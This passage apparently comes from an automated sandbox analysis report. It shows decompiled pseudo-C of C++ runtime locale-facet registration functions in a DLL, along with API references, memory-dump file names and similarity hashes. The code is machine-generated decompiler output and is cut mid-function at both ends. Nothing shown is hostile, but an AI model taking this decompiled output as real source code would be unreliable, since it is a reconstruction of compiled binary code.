				_t178 =  *0x6de96cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6DDB161C(0x6de96b38);
				_t133 = _a8;
				_t64 = E6DDB171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t173, _t178, 0x14);
							E6DDD6653( &_v20, 0);
							_t179 =  *0x6de96ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6DDB161C(0x6de96cb8);
							_t140 = _a8;
							_t174 = E6DDB171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t130, _t174, _t179, 0x14);
										E6DDD6653( &_v20, 0);
										_t180 =  *0x6de96cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6DDB161C(0x6de96cbc);
										_t147 = _a8;
										_t175 = E6DDB171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438( &_v32);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t130, _t175, _t180, 0x14);
													E6DDD6653( &_v20, 0);
													_t181 =  *0x6de96cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6DDB161C(0x6de96cc0);
													_t154 = _a8;
													_t176 = E6DDB171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6DDD66BA( &_v20);
														return E6DDF0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6DDDAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6DDB1438(_t158);
																E6DDF3D74( &_v32, 0x6de93504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6de3ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6DDD6FD3(__eflags, _t176);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6de96cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t175);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6de96cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t174);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6de96ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t173);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6de96cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA106
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA110
int.LIBCPMT ref: 6DDDA127

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDA14A
std::_Facet_Register.LIBCPMT ref: 6DDDA161
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA19F

Strings

8km, xrefs: 6DDDA11B

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8km
API String ID: 1394824916-2508146540
Opcode ID: d8f719a977699210efe5a4c3f901df8d780f2b0e519a46383bf5ae422b2dec50
Instruction ID: da27d7a267206f276a88000143b8ebca5613b52e68df2a0c1e3a5d993624db8b
Opcode Fuzzy Hash: d8f719a977699210efe5a4c3f901df8d780f2b0e519a46383bf5ae422b2dec50
Instruction Fuzzy Hash: 0611E071809119DBCF01FBA4C840EBEB7B5AF54318F264009F510AB290DF749A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t902 - 0x14, 0);
				_t861 =  *0x6de96db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6DDB161C(0x6de96d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6DDD66BA(_t902 - 0x14);
					return E6DDF0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6DDE0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t902 - 0x20);
							E6DDF3D74(_t902 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t840, _t861, 0x14);
							E6DDD6653(_t902 - 0x14, 0);
							_t862 =  *0x6de96dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6DDB161C(0x6de96b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6DDD66BA(_t902 - 0x14);
								return E6DDF0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6DDE0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t902 - 0x20);
										E6DDF3D74(_t902 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t637, _t841, _t862, 0x14);
										E6DDD6653(_t902 - 0x14, 0);
										_t863 =  *0x6de96de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6DDB161C(0x6de96d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6DDD66BA(_t902 - 0x14);
											return E6DDF0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6DDE0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t902 - 0x20);
													E6DDF3D74(_t902 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t637, _t842, _t863, 0x14);
													E6DDD6653(_t902 - 0x14, 0);
													_t864 =  *0x6de96db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6DDB161C(0x6de96d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6DDD66BA(_t902 - 0x14);
														return E6DDF0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6DDE0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t902 - 0x20);
																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t637, _t843, _t864, 0x14);
																E6DDD6653(_t902 - 0x14, 0);
																_t865 =  *0x6de96dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6DDB161C(0x6de96d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6DDD66BA(_t902 - 0x14);
																	return E6DDF0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6DDE0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t902 - 0x20);
																			E6DDF3D74(_t902 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t637, _t844, _t865, 0x14);
																			E6DDD6653(_t902 - 0x14, 0);
																			_t866 =  *0x6de96dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6DDB161C(0x6de96d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6DDD66BA(_t902 - 0x14);
																				return E6DDF0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6DDE0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t902 - 0x20);
																						E6DDF3D74(_t902 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t637, _t845, _t866, 0x14);
																						E6DDD6653(_t902 - 0x14, 0);
																						_t867 =  *0x6de96df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6DDB161C(0x6de96d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6DDD66BA(_t902 - 0x14);
																							return E6DDF0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6DDE1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t902 - 0x20);
																									E6DDF3D74(_t902 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t637, _t846, _t867, 0x14);
																									E6DDD6653(_t902 - 0x14, 0);
																									_t868 =  *0x6de96dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6DDB161C(0x6de96d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6DDD66BA(_t902 - 0x14);
																										return E6DDF0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6DDE10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t902 - 0x20);
																												E6DDF3D74(_t902 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t637, _t847, _t868, 0x14);
																												E6DDD6653(_t902 - 0x14, 0);
																												_t869 =  *0x6de96df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6DDB161C(0x6de96da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6DDD66BA(_t902 - 0x14);
																													return E6DDF0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6DDE1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t902 - 0x20);
																															E6DDF3D74(_t902 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t637, _t848, _t869, 0x14);
																															E6DDD6653(_t902 - 0x14, 0);
																															_t870 =  *0x6de96df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6DDB161C(0x6de96da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6DDD66BA(_t902 - 0x14);
																																return E6DDF0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6DDE11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t902 - 0x20);
																																		E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t637, _t849, _t870, 0x14);
																																		E6DDD6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6de96dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6DDB161C(0x6de96d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6DDD66BA(_t902 - 0x14);
																																			return E6DDF0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6DDE1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t902 - 0x20);
																																					E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t637, _t850, _t871, 0x14);
																																					E6DDD6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6de96dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6DDB161C(0x6de96d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6DDD66BA(_t902 - 0x14);
																																						return E6DDF0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6DDE12B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t902 - 0x20);
																																								E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t637, _t851, _t872, 0x14);
																																								E6DDD6653(_t902 - 0x14, 0);
																																								_t873 =  *0x6de96dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6DDB161C(0x6de96d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6DDD66BA(_t902 - 0x14);
																																									return E6DDF0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6DDE1339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t902 - 0x20);
																																											E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t637, _t852, _t873, 0x14);
																																											E6DDD6653(_t902 - 0x14, 0);
																																											_t874 =  *0x6de96db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6DDB161C(0x6de96d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6DDD66BA(_t902 - 0x14);
																																												return E6DDF0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6DDE13A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t902 - 0x20);
																																														E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t637, _t853, _t874, 0x14);
																																														E6DDD6653(_t902 - 0x14, 0);
																																														_t875 =  *0x6de96ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6DDB161C(0x6de96d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6DDD66BA(_t902 - 0x14);
																																															return E6DDF0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6DDE1409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t902 - 0x20);
																																																	E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t637, _t854, _t875, 0x14);
																																																	E6DDD6653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6de96de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6DDB161C(0x6de96d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t902 - 0x14);
																																																		return E6DDF0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6DDE1471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t902 - 0x20);
																																																				E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t637, _t855, _t876, 0x14);
																																																				E6DDD6653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6de96dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6DDB161C(0x6de96da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t902 - 0x14);
																																																					return E6DDF0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6DDE14EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t902 - 0x20);
																																																							E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t637, _t856, _t877, 0x14);
																																																							E6DDD6653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6de96dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6DDB161C(0x6de96d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t902 - 0x14);
																																																								return E6DDF0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6DDE1558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t902 - 0x20);
																																																										E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t637, _t857, _t878, 0x14);
																																																										E6DDD6653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6de96e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6DDB161C(0x6de96dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t902 - 0x14);
																																																											return E6DDF0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6DDE15C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t902 - 0x20);
																																																													E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t637, _t858, _t879, 0x14);
																																																													E6DDD6653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6de96dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6DDB161C(0x6de96d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t902 - 0x14);
																																																														return E6DDF0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6DDE162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6DDB1438(_t777);
																																																																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de3851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6de3c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6DDE542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6DDF0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t859);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6de96dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t858);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6de96e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t857);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6de96dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
